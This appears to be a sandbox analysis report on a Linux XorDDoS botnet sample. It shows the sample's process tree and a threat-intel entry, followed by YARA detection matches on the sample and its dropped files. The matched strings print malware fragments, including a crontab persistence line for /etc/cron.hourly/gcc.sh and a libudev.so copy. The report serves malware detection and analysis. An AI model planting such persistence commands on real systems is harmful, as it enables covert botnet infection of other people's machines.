HaJTqGiPpD New Fork (PID: 6543, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6544, Parent: 6543)

gdmrzwxnqy (PID: 6544, Parent: 6543, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy su 6230

gdmrzwxnqy New Fork (PID: 6545, Parent: 6544)

HaJTqGiPpD New Fork (PID: 6546, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6547, Parent: 6546)

gdmrzwxnqy (PID: 6547, Parent: 6546, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy who 6230

gdmrzwxnqy New Fork (PID: 6552, Parent: 6547)

HaJTqGiPpD New Fork (PID: 6548, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6549, Parent: 6548)

gdmrzwxnqy (PID: 6549, Parent: 6548, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy "ps -ef" 6230

gdmrzwxnqy New Fork (PID: 6551, Parent: 6549)

HaJTqGiPpD New Fork (PID: 6550, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6553, Parent: 6550)

gdmrzwxnqy (PID: 6553, Parent: 6550, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy sh 6230

gdmrzwxnqy New Fork (PID: 6554, Parent: 6553)

HaJTqGiPpD New Fork (PID: 6557, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6558, Parent: 6557)

eperfpvgsg (PID: 6558, Parent: 6557, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg ls 6230

eperfpvgsg New Fork (PID: 6559, Parent: 6558)

HaJTqGiPpD New Fork (PID: 6560, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6561, Parent: 6560)

eperfpvgsg (PID: 6561, Parent: 6560, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg "cat resolv.conf" 6230

eperfpvgsg New Fork (PID: 6568, Parent: 6561)

HaJTqGiPpD New Fork (PID: 6562, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6563, Parent: 6562)

eperfpvgsg (PID: 6563, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg ls 6230

eperfpvgsg New Fork (PID: 6570, Parent: 6563)

HaJTqGiPpD New Fork (PID: 6564, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6565, Parent: 6564)

eperfpvgsg (PID: 6565, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg "ls -la" 6230

eperfpvgsg New Fork (PID: 6569, Parent: 6565)

HaJTqGiPpD New Fork (PID: 6566, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6567, Parent: 6566)

eperfpvgsg (PID: 6567, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg pwd 6230

eperfpvgsg New Fork (PID: 6571, Parent: 6567)

HaJTqGiPpD New Fork (PID: 6575, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6576, Parent: 6575)

kfgwgvyckw (PID: 6576, Parent: 6575, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "sleep 1" 6230

kfgwgvyckw New Fork (PID: 6580, Parent: 6576)

HaJTqGiPpD New Fork (PID: 6577, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6578, Parent: 6577)

kfgwgvyckw (PID: 6578, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw bash 6230

kfgwgvyckw New Fork (PID: 6584, Parent: 6578)

HaJTqGiPpD New Fork (PID: 6579, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6581, Parent: 6579)

kfgwgvyckw (PID: 6581, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw id 6230

kfgwgvyckw New Fork (PID: 6587, Parent: 6581)

HaJTqGiPpD New Fork (PID: 6582, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6583, Parent: 6582)

kfgwgvyckw (PID: 6583, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "netstat -an" 6230

kfgwgvyckw New Fork (PID: 6588, Parent: 6583)

HaJTqGiPpD New Fork (PID: 6585, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6586, Parent: 6585)

kfgwgvyckw (PID: 6586, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "sleep 1" 6230

kfgwgvyckw New Fork (PID: 6589, Parent: 6586)

HaJTqGiPpD New Fork (PID: 6592, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6593, Parent: 6592)

hymrnjeilx (PID: 6593, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx bash 6230

hymrnjeilx New Fork (PID: 6600, Parent: 6593)

HaJTqGiPpD New Fork (PID: 6594, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6595, Parent: 6594)

hymrnjeilx (PID: 6595, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx pwd 6230

hymrnjeilx New Fork (PID: 6597, Parent: 6595)

HaJTqGiPpD New Fork (PID: 6596, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6598, Parent: 6596)

hymrnjeilx (PID: 6598, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx gnome-terminal 6230

hymrnjeilx New Fork (PID: 6603, Parent: 6598)

HaJTqGiPpD New Fork (PID: 6599, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6601, Parent: 6599)

hymrnjeilx (PID: 6601, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx gnome-terminal 6230

hymrnjeilx New Fork (PID: 6605, Parent: 6601)

HaJTqGiPpD New Fork (PID: 6602, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6604, Parent: 6602)

hymrnjeilx (PID: 6604, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx "ls -la" 6230

hymrnjeilx New Fork (PID: 6606, Parent: 6604)

HaJTqGiPpD New Fork (PID: 6612, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6613, Parent: 6612)

rjhjbiwpsr (PID: 6613, Parent: 6612, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr uptime 6230

rjhjbiwpsr New Fork (PID: 6617, Parent: 6613)

HaJTqGiPpD New Fork (PID: 6614, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6615, Parent: 6614)

rjhjbiwpsr (PID: 6615, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr "grep \"A\"" 6230

rjhjbiwpsr New Fork (PID: 6622, Parent: 6615)

HaJTqGiPpD New Fork (PID: 6616, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6618, Parent: 6616)

rjhjbiwpsr (PID: 6618, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr ls 6230

rjhjbiwpsr New Fork (PID: 6624, Parent: 6618)

HaJTqGiPpD New Fork (PID: 6619, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6620, Parent: 6619)

rjhjbiwpsr (PID: 6620, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr gnome-terminal 6230

rjhjbiwpsr New Fork (PID: 6625, Parent: 6620)

HaJTqGiPpD New Fork (PID: 6621, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6623, Parent: 6621)

rjhjbiwpsr (PID: 6623, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr "cd /etc" 6230

rjhjbiwpsr New Fork (PID: 6626, Parent: 6623)

HaJTqGiPpD New Fork (PID: 6629, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6630, Parent: 6629)

nopfevkjnk (PID: 6630, Parent: 6629, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk who 6230

nopfevkjnk New Fork (PID: 6634, Parent: 6630)

HaJTqGiPpD New Fork (PID: 6631, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6632, Parent: 6631)

nopfevkjnk (PID: 6632, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk top 6230

nopfevkjnk New Fork (PID: 6639, Parent: 6632)

HaJTqGiPpD New Fork (PID: 6633, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6635, Parent: 6633)

nopfevkjnk (PID: 6635, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk "sleep 1" 6230

nopfevkjnk New Fork (PID: 6641, Parent: 6635)

HaJTqGiPpD New Fork (PID: 6636, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6637, Parent: 6636)

nopfevkjnk (PID: 6637, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk uptime 6230

nopfevkjnk New Fork (PID: 6642, Parent: 6637)

HaJTqGiPpD New Fork (PID: 6638, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6640, Parent: 6638)

nopfevkjnk (PID: 6640, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk "grep \"A\"" 6230

nopfevkjnk New Fork (PID: 6643, Parent: 6640)

HaJTqGiPpD New Fork (PID: 6646, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6647, Parent: 6646)

vjejifjmgs (PID: 6647, Parent: 6646, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs uptime 6230

vjejifjmgs New Fork (PID: 6652, Parent: 6647)

HaJTqGiPpD New Fork (PID: 6648, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6649, Parent: 6648)

vjejifjmgs (PID: 6649, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs id 6230

vjejifjmgs New Fork (PID: 6658, Parent: 6649)

HaJTqGiPpD New Fork (PID: 6650, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6651, Parent: 6650)

vjejifjmgs (PID: 6651, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs "grep \"A\"" 6230

vjejifjmgs New Fork (PID: 6657, Parent: 6651)

HaJTqGiPpD New Fork (PID: 6653, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6654, Parent: 6653)

vjejifjmgs (PID: 6654, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs sh 6230

vjejifjmgs New Fork (PID: 6659, Parent: 6654)

HaJTqGiPpD New Fork (PID: 6655, Parent: 6230)

HaJTqGiPpD New Fork (PID: 6656, Parent: 6655)

vjejifjmgs (PID: 6656, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs pwd 6230

vjejifjmgs New Fork (PID: 6660, Parent: 6656)

systemd New Fork (PID: 6242, Parent: 6241)

snapd-env-generator (PID: 6242, Parent: 6241, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
HaJTqGiPpD	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
HaJTqGiPpD	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
HaJTqGiPpD	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
HaJTqGiPpD	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
HaJTqGiPpD	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
HaJTqGiPpD	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
HaJTqGiPpD	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
HaJTqGiPpD	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 3 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/ibkljkndlm	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ibkljkndlm	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ibkljkndlm	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ibkljkndlm	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ibkljkndlm	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ibkljkndlm	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ibkljkndlm	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/lib/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/qrabekbstr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/qrabekbstr	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/qrabekbstr	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/qrabekbstr	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/qrabekbstr	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/qrabekbstr	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/qrabekbstr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/qrabekbstr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/kigdktzeum	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/kigdktzeum	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/kigdktzeum	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/kigdktzeum	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/kigdktzeum	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/kigdktzeum	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/kigdktzeum	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/kigdktzeum	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/eqznayducj	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/eqznayducj	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/eqznayducj	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/eqznayducj	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/eqznayducj	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/eqznayducj	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/eqznayducj	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/eqznayducj	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
